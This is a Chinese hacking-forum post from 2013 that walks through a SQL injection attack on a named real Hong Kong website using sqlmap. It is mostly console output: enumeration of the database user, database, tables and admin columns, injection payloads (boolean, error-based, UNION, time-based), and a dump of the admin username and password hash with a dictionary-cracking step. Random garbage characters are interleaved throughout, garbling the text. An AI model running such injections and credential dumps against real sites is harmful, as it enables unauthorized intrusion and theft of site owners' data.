找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2295|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; @$ u) L/ m, T3 J8 v/ d/ t4 Xms "Mysql" --current-user       /*  注解:获取当前用户名称
& J  V! j) O1 `" e$ q; s5 s4 ~    sqlmap/0.9 - automatic SQL injection and database takeover tool
& j0 M4 O) C4 Q1 {3 S    http://sqlmap.sourceforge.net
  • starting at: 16:53:54: X( i, F' C% [# h. P
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    3 ]7 v& h- }, S/ Q; n session file7 r8 s+ s5 n5 B/ C6 t. S
    [16:53:54] [INFO] resuming injection data from session file! q, i2 w! `# J3 T" E
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file* [3 ^$ I% m; b% a6 ^! A3 D
    [16:53:54] [INFO] testing connection to the target url- Z4 ~5 S$ ~  r1 N5 F' h
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque1 z4 z/ w9 f  j
    sts:2 f/ ~0 B+ H) ^8 w3 u, l$ Q; R1 i
    ---
    3 b) J7 c9 }1 G- |* ~/ kPlace: GET$ e5 I0 j+ C8 _
    Parameter: id8 H3 h# Q0 {6 }$ @3 Y* S/ M
        Type: boolean-based blind# R: }( ^% g8 e( L( X( `
        Title: AND boolean-based blind - WHERE or HAVING clause
    4 u# _* Q2 u1 I    Payload: id=276 AND 799=799. F* r% @# D; e0 j
        Type: error-based
    ( i) D4 K$ a! Y: A, G/ L0 ]    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause4 q- a! v  Z4 E; Y4 W+ h
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    4 j; X" e. `/ l# j* `$ h8 Z+ D- u120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    + g$ S0 V) Q, R$ n. }),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)- n5 i  S" Y2 `0 P. v
        Type: UNION query
    ) q0 V* f* b# w$ m$ i0 U    Title: MySQL UNION query (NULL) - 1 to 10 columns) @3 ^  c6 a8 q" n9 F* q  A/ m
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    ; W* k4 r! A5 k' r, J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    7 ^6 b! z7 h- {) Z* L" c! R: @2 }7 {CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    $ J! U5 v8 `9 H7 x7 Z- u0 Y    Type: AND/OR time-based blind3 \& f3 J0 `" z% E- N/ f" c$ [
        Title: MySQL > 5.0.11 AND time-based blind
    ; G9 S( a) N" W    Payload: id=276 AND SLEEP(5)* s0 i* M6 |3 U+ w. [+ F) U$ F
    ---
    % X4 n6 V5 i/ [5 c) v1 K% O/ F[16:53:55] [INFO] the back-end DBMS is MySQL6 Y9 X6 K+ r' S# O; \
    web server operating system: Windows' b+ ?. d; ]3 D* Z- `/ `
    web application technology: Apache 2.2.11, PHP 5.3.02 b/ @5 w: H) n$ |1 V( @
    back-end DBMS: MySQL 5.07 f: i9 J' H0 {/ {
    [16:53:55] [INFO] fetching current user
    / B0 j% K/ ~( o; Q9 fcurrent user:    'root@localhost'   8 Q8 i4 {/ f2 K
    [16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou8 b! `5 x  q( I" G6 B* H3 h/ A) N
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:583 j; O& G# r# K7 m- P, ]
    # ~8 p0 ^9 a, x
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    ; L! z+ D2 I, W; [: d+ mms "Mysql" --current-db                  /*当前数据库
    # i5 s3 Y6 Y# J" m& r+ P. y" h( X    sqlmap/0.9 - automatic SQL injection and database takeover tool+ C7 D+ A  p8 f
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    ! K2 W) A6 U& _2 F& ][16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 L  [! W8 N% j! n( ~! b
    session file  ~" w9 q) r! W
    [16:54:16] [INFO] resuming injection data from session file
    . u3 r1 t# ?1 f' {0 _+ F[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    ) w% ^) W: B% V2 D* {6 F; l- H[16:54:16] [INFO] testing connection to the target url
    $ W+ t7 C$ y, g: p* Q; D: Usqlmap identified the following injection points with a total of 0 HTTP(s) reque
    0 w$ y6 l* Q4 E7 h& vsts:
    # u; U' v: B: j# F3 `7 k' k5 [& D---
    0 A, h" T6 {3 N, f3 LPlace: GET1 x6 S& c) d' V, Z3 s1 ?
    Parameter: id
    - |; W5 ?, e9 M7 y  Q    Type: boolean-based blind
    # ]9 X* x; w( `2 m7 x4 d    Title: AND boolean-based blind - WHERE or HAVING clause, x. I, B/ G9 m2 m) R9 V
        Payload: id=276 AND 799=799, E' I/ A* p+ i# s: B
        Type: error-based% F# w6 l, y- l6 }7 U4 p# u
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    7 Q& y( X' p1 H7 s    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% s5 ^3 x, C" N
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    3 y/ y3 x: n7 C0 h),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)9 f3 G1 q9 b2 f7 A+ Y* G* n! d
        Type: UNION query
    % t5 K. ^8 z5 t, h0 p/ S. l    Title: MySQL UNION query (NULL) - 1 to 10 columns
    " U% h' D, n3 v* @, Q0 J    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR0 }4 u4 b* V+ v3 V+ F9 [, z% P
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    . x/ N1 ^+ i$ vCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#: J7 v- y' T2 @7 H
        Type: AND/OR time-based blind
    ) t. I4 n7 I( B" N* o- o6 f2 U+ K' e    Title: MySQL > 5.0.11 AND time-based blind! `! V% B4 f8 k) R- B; S
        Payload: id=276 AND SLEEP(5)
    2 d  W$ E0 i) @6 b# B---: S0 F8 P* _, u; ?5 o) Y! E  a) K
    [16:54:17] [INFO] the back-end DBMS is MySQL; x/ f' R" G* K, N. R3 W7 m
    web server operating system: Windows
    ' v$ D4 G+ d6 u8 V6 aweb application technology: Apache 2.2.11, PHP 5.3.08 S% X2 `& U* a# W4 W. j
    back-end DBMS: MySQL 5.03 A" Z0 e( d  Q+ r. e  K
    [16:54:17] [INFO] fetching current database
    , U9 U' |( X( r3 i! Xcurrent database:    'wepost'
    ) d2 i$ J0 V% U2 n[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    & u! G) N# O: {. ^' v2 J4 Ztput\www.wepost.com.hk'
  • shutting down at: 16:54:18- l" ^$ n: y# l$ ^7 @! ~
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db5 h/ `6 ?4 S! L; V2 P
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    & e8 ^' u# l" d9 a    sqlmap/0.9 - automatic SQL injection and database takeover tool
    , Y2 d3 b- N0 b9 [0 K    http://sqlmap.sourceforge.net
  • starting at: 16:55:25# e  j. `: B) x: q7 S6 V, Y, _
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
    : H! I% J# {1 R" w) }* ~ session file
    3 W2 r" g) z% ^3 f7 z0 R: [[16:55:25] [INFO] resuming injection data from session file$ N- t. ?5 G7 `+ }) @' U7 j+ T6 s4 S
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file; v0 W: d* b4 v7 V& r: P
    [16:55:25] [INFO] testing connection to the target url
    6 U) |. |* D, rsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    / M* u& }/ W/ b2 }. J5 Ests:/ j2 Z! y1 \3 x, T1 }
    ---2 V1 x. K6 z- T0 J5 {
    Place: GET
    , {( S2 h0 R- U9 [: V! O: L& m, \6 VParameter: id
    3 ]3 `5 D( M- v  n' v1 `    Type: boolean-based blind
    ( ]1 L) R9 W# p( n/ k1 ^& Q5 K* c    Title: AND boolean-based blind - WHERE or HAVING clause+ v0 a8 M( E6 b6 U8 K5 y
        Payload: id=276 AND 799=799
    ( W) d4 O2 V* _9 h9 e- A0 d& m    Type: error-based
    4 r7 M1 C. {; G: Z3 P    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ( f4 N. B4 C, K5 [    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    8 Q# H) r' i% l# m7 A5 V9 \2 F120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    1 Y( W1 }! H. \, ^! y),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    0 A# W8 L" e$ O$ \; p    Type: UNION query$ L- O* @' w& `# K
        Title: MySQL UNION query (NULL) - 1 to 10 columns  Z4 I3 j0 Z. u* v
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR) r; q3 T" f% \  R8 A' N
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
      l' c* l5 r3 @9 v  s2 m8 NCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL## {+ D* Q, ~6 r- x6 ]
        Type: AND/OR time-based blind
    ( G  U2 |; S% c    Title: MySQL > 5.0.11 AND time-based blind5 z' Y& p8 s' q" ^% K8 J
        Payload: id=276 AND SLEEP(5)8 h: q* ~& X$ M7 F5 ^( s
    ---2 K* o4 e, I/ g7 O; e
    [16:55:26] [INFO] the back-end DBMS is MySQL
    ( {" d% t; d' ]2 }% W% ^web server operating system: Windows
    - C' S4 N* t2 J5 vweb application technology: Apache 2.2.11, PHP 5.3.0
    ! R- B2 A" b5 ]8 d7 Nback-end DBMS: MySQL 5.08 G( g; \; [+ Q4 K0 k& F) f
    [16:55:26] [INFO] fetching tables for database 'wepost'
    ' h! Y. B  M4 q6 }( x7 c7 w[16:55:27] [INFO] the SQL query used returns 6 entries0 u8 s" Y. u" n+ Y1 G" Q8 }& e
    Database: wepost; }! n" M0 A! T
    [6 tables]  p( C# d5 }. l3 x# H
    +-------------+% }! W3 P8 K: O2 z6 V; H; i
    | admin       |% v' J8 k) Z% `5 b( j
    | article     |- N: ?, N3 y- V  j$ s9 T
    | contributor |
    + t/ r! J' g4 ?1 ~5 E( A. M| idea        |
    ( M8 M2 R1 t* U6 s$ Q  C; ?| image       |7 b! \3 [. {4 ~' {
    | issue       |( _% e- O) I" q; B
    +-------------+5 i' f' U3 x: @+ b4 ~
    [16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
    & z8 D  b3 V6 H& ]- Ltput\www.wepost.com.hk'
  • shutting down at: 16:55:335 A6 Q# [0 Z, g  z

    ' t# f+ E$ g: ]' z" U3 Q% P/ oD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    3 U! U$ j+ @" S  z: ems "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名* ^* b$ n# a; R1 ^
        sqlmap/0.9 - automatic SQL injection and database takeover tool  `( C. ?& S+ h, v* w: {
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06
    + r7 e1 o4 R0 Fsqlmap identified the following injection points with a total of 0 HTTP(s) reque
    8 J+ ?+ s! K- p* {2 Hsts:9 o4 e* g" Z' |! u) L' ?. @3 I
    ---
    . B. Z) d# K# R5 ^Place: GET
    & u& N- F# ], _7 W/ AParameter: id% p# r) D; }4 p) J% `8 f
        Type: boolean-based blind
    # w- w( ]: i4 X  z% z4 H    Title: AND boolean-based blind - WHERE or HAVING clause
    ! b- m  ~% \9 l$ M/ q& W( {    Payload: id=276 AND 799=799
    & J2 z2 `$ |- _    Type: error-based* l7 c. H2 `! R6 o
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ! R6 _/ Z; S3 b% U$ g6 U. d    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    . X/ w0 d9 H' u, E120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58# N/ \& I* K% ?* x6 ~' S& j
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    6 U+ ~) [- ^/ }; y- B3 P    Type: UNION query, x' U5 v4 g! `# o6 q: e; E) A3 g
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    , ^2 q' Q! u1 {" k6 l7 H# l9 G    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR, I- l$ I) [- J8 e/ e- w
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    * z; ]& l7 E- u* `; i8 o4 [9 rCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    7 I! o$ a: f4 q$ z$ t$ A    Type: AND/OR time-based blind
    ) w: [! P! N; M* z    Title: MySQL > 5.0.11 AND time-based blind" ?( O9 s0 V; k9 d0 U, [
        Payload: id=276 AND SLEEP(5)
    7 D' m- d3 j! {4 V4 `; b---
    % i& m1 H2 [) F/ i- E6 Z$ W$ n) Z9 rweb server operating system: Windows
    % D# ^" H! |! V8 ]. e% Dweb application technology: Apache 2.2.11, PHP 5.3.0
    4 f. x9 b6 F$ A1 {. |1 u: qback-end DBMS: MySQL 5.0& Q" i$ b+ [7 g" n4 ?/ y+ C
    [16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    / m( t: i  F1 G# Wssion': wepost, wepost( f+ W! Y+ T! ]5 T5 A0 e6 u
    Database: wepost4 O, g. D- e6 a5 `
    Table: admin
    , H5 [7 G; J: c( P[4 columns]
    0 h: {) \- }3 M& D+----------+-------------+
    : C! E$ L) M" [+ v9 F' ^/ T) r  Q| Column   | Type        |' ~2 w0 B9 H7 Z0 B/ f$ a( g
    +----------+-------------+3 {  g. Y  v( r/ d
    | id       | int(11)     |% {0 L% j  _0 a0 ~4 z  d
    | password | varchar(32) |
    # q7 h0 {" B6 V! W+ W9 I| type     | varchar(10) |6 W$ \9 E$ d1 w) p. p
    | userid   | varchar(20) |2 {( Q3 }- H/ J1 f6 G
    +----------+-------------+. G" K5 y. A* O; K/ {7 J/ @! r; n
  • shutting down at: 16:56:19% Z2 j/ i! E# Y) e% ~4 B0 u) C

    9 A7 D. x- N( T% Z, J0 u5 CD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    , l9 y$ N: c5 x9 l& C2 n, bms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容
    ( G5 a4 O+ e' Q; L3 e! q    sqlmap/0.9 - automatic SQL injection and database takeover tool
    * O: I6 Z. Y& j: x1 a5 ]5 m    http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    . k2 A/ X" u* j! U' Usqlmap identified the following injection points with a total of 0 HTTP(s) reque
    6 ~$ W$ u: ~& w/ G- N, o: _" i0 lsts:% p& E' D+ m* g2 J
    ---' J, x" c2 Y3 @
    Place: GET
    ! H0 ]. t6 I/ F( |2 q/ J& s9 DParameter: id
    4 Z  o/ X2 E. {% }! W& [" E    Type: boolean-based blind
    ( [: C$ |7 M4 t) D    Title: AND boolean-based blind - WHERE or HAVING clause
    ) ~) D$ X# @& v5 n- R    Payload: id=276 AND 799=799
    0 {. J/ j7 I/ M& v0 x+ A$ \    Type: error-based
    : O3 F6 I1 t2 X3 Q    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- @0 I# H  Z% g: K3 C- P. }5 F
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,  r' G% {) V+ E- g& E4 b: r9 k
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,581 E7 Y2 ~- |% M5 {: [. R; A
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    # R! F. H. a4 f7 K7 M    Type: UNION query/ J( e3 @' b) M" I7 a* r
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    . u  b8 i2 Q2 f1 I) M0 b3 r    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    6 _4 |$ {6 {& S- O# W" L(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ' U: h6 n( e3 }! r0 XCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    4 I1 c5 z$ s" c; B% d    Type: AND/OR time-based blind
    : S% S% Z( {+ M& n! {* W    Title: MySQL > 5.0.11 AND time-based blind9 t( b# F! n9 m  F2 c7 U
        Payload: id=276 AND SLEEP(5)
    ) x, R" q0 b9 H1 F" M4 @' D---. }7 v0 m% I- h8 f6 a. ]! @
    web server operating system: Windows
    1 D6 k% N7 j% Fweb application technology: Apache 2.2.11, PHP 5.3.0
    9 m; k! \. h1 b: @, eback-end DBMS: MySQL 5.0
    ) W0 }7 a! X& Y. P! i6 S, Srecognized possible password hash values. do you want to use dictionary attack o9 J/ q/ `' C1 l: x( u0 x
    n retrieved table items? [Y/n/q] y
    # X1 a; e, j: d, vwhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    & H6 ~* F2 f0 x) Mdo you want to use common password suffixes? (slow!) [y/N] y/ m3 y1 H6 {4 ~$ h) u  \. J
    Database: wepost! h! ~  D8 d3 z: n  W
    Table: admin
    " u  f5 C3 S7 N& P; j2 U7 \[1 entry]
    / b- M- L" b- q) o; a% c& d. ~+----------------------------------+------------+
    : w( w: U( O+ v2 k! ?| password                         | userid     |+ D- _2 c1 a4 q5 ?& A
    +----------------------------------+------------+( J, y" b. w+ _+ R; a* {- t
    | 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" k& W0 ~8 z8 D  v% V2 q  t) A5 q
    +----------------------------------+------------+4 G6 [0 q/ T3 Q
  • shutting down at: 16:58:14
    ! k8 m1 C) m8 ?; ]0 \
    5 U  y) p. K( N+ _' X5 ^$ }D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表